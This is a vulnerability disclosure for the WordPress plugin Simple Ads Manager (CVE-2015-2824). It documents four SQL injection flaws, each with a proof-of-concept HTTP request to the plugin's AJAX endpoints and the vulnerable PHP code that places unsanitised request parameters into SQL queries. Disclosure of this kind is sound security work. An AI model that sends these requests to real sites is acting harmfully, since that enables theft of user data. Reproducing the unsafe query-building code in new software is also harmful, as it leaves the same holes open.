#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL
Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link:
https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team
::PROOF OF CONCEPT::
---SQL INJECTION 1---
+ REQUEST:
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101
Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;
PHPSESSID=kqvtir87g33e2ujkc290l5bmm7;
cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION
HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL
INJECTION HERE>&level=3
- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:
case 'sam_ajax_sam_hits':
if(isset($_POST['hits']) && is_array($_POST['hits'])) {
$hits = $_POST['hits'];
$values = '';
$remoteAddr = $_SERVER['REMOTE_ADDR'];
foreach($hits as $hit) {
$values .= ((empty($values)) ? '' : ', ')
. "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
}
$sql = "INSERT INTO $sTable (id, pid, event_time,
event_type, remote_addr) VALUES {$values};";
$result = $wpdb->query($sql);
if($result > 0) echo json_encode(array('success'
=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
else echo json_encode(array(
'success' => false,
'result' => $result,
'sql' => $sql,
'hits' => $hits,
'values' => $values
));
}
break;
---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
$custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
$sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) :
'Post';
$sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) :
'Page';
//set @row_num = 0;
//SELECT @row_num := @row_num + 1 AS recid
$sql = "SELECT
wp.id,
wp.post_title AS title,
wp.post_type AS type
FROM
$postTable wp
WHERE
wp.post_status = 'publish' AND
FIND_IN_SET(wp.post_type, 'post,page{$custs}')
ORDER BY wp.id;";
$posts = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($posts as &$val) {
switch($val['type']) {
case 'post':
$val['type'] = $sPost;
break;
case 'page':
$val['type'] = $sPage;
break;
default:
$val['type'] = $sPost . ': '.$val['type'];
break;
}
$k++;
$val['recid'] = $k;
}
$out = array(
'status' => 'success',
'total' => count($posts),
'records' => $posts
);
break;
---SQL INJECTION 3---
+REQUEST:
POST
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL
INJECTION HERE> HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmb=30068390.1.10.1427794022; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
action=load_combo_data
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+Vulnerable code: from line 225 to 255
case 'sam_ajax_load_combo_data':
$page = $_GET['page'];
$rows = $_GET['rows'];
$searchTerm = $_GET['searchTerm'];
$offset = ((int)$page - 1) * (int)$rows;
$sql = "SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
wu.user_email AS email
FROM
$uTable wu
WHERE wu.user_nicename LIKE '{$searchTerm}%'
ORDER BY wu.id
LIMIT $offset, $rows;";
$users = $wpdb->get_results($sql, ARRAY_A);
$sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE
'{$searchTerm}%';";
$rTotal = $wpdb->get_var($sql);
$total = ceil((int)$rTotal/(int)$rows);
$out = array(
'page' => $page,
'records' => count($users),
'rows' => $users,
'total' => $total,
'offset' => $offset
);
break;
---SQL INJECTION 4---
+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION
HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL
INJECTION HERE>&sadmin=<SQL INJECTION HERE>
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code: from line 188 to 223
case 'sam_ajax_load_users':
$roleSubscriber = (isset($_REQUEST['subscriber'])) ?
urldecode($_REQUEST['subscriber']) : 'Subscriber';
$roleContributor = (isset($_REQUEST['contributor'])) ?
urldecode($_REQUEST['contributor']) : 'Contributor';
$roleAuthor = (isset($_REQUEST['author'])) ?
urldecode($_REQUEST['author']) : 'Author';
$roleEditor = (isset($_REQUEST['editor'])) ?
urldecode($_REQUEST['editor']) : 'Editor';
$roleAdministrator = (isset($_REQUEST["admin"])) ?
urldecode($_REQUEST["admin"]) : 'Administrator';
$roleSuperAdmin = (isset($_REQUEST['sadmin'])) ?
urldecode($_REQUEST['sadmin']) : 'Super Admin';
$sql = "SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
(CASE wum.meta_value
WHEN 0 THEN '$roleSubscriber'
WHEN 1 THEN '$roleContributor'
WHEN 2 THEN '$roleAuthor'
ELSE
IF(wum.meta_value > 2 AND wum.meta_value <= 7,
'$roleEditor',
IF(wum.meta_value > 7 AND wum.meta_value <= 10,
'$roleAdministrator',
IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
)
)
END) AS role
FROM $uTable wu
INNER JOIN $umTable wum
ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
ORDER BY wu.id;";
$users = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($users as &$val) {
$k++;
$val['recid'] = $k;
}
$out = $users;
break;
REFERENCE:
+ https://www.youtube.com/watch?v=HPJ1r9dhIB4
Best Regards
-----------------------------------
ITAS Team (www.itas.vn)